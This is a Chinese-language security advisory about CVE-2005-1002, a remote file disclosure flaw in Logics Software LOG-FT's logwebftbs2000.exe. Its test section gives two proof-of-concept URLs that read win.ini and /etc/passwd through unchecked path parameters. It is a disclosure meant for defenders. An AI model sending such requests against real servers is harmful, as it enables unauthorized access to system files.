安全研究

安全漏洞
Logics Software LOG-FT远程文件泄露漏洞

发布日期:2005-05-05
更新日期:2005-05-05

受影响系统:
Logics Software LOG-FT
描述:
BUGTRAQ  ID: 12998
CVE(CAN) ID: CVE-2005-1002

Logics Software LOG-FT是西门子BS2000大型计算机PC端对应的组件,用于管理文件的传输和处理。

LOG-FT处理用户请求时存在输入验证漏洞,远程攻击者可能利用此漏洞非授权访问系统文件。

LOG-FT的logwebftbs2000.exe程序没有正确检查过滤HTTP GET请求中的用户参数,远程攻击者可以通过直接指定系统文件的路径和文件名非授权访问到这些敏感信息。

<*来源:Pedro Viuales
        Rom Ramirez
  *>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

http://www.example.com/logwebcgi/logwebftbs2000.exe?VAR_FT_LANG=c:\&VAR_FT_TMPL=winnt/win.ini
http://www.example.com/logwebcgi/logwebftbs2000.exe?VAR_FT_LANG=/etc&VAR_FT_TMPL=passwd

建议:
厂商补丁:

Logics Software
---------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.logicssoftware.com/Products/bs2000/FT.htm

浏览次数:2677
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障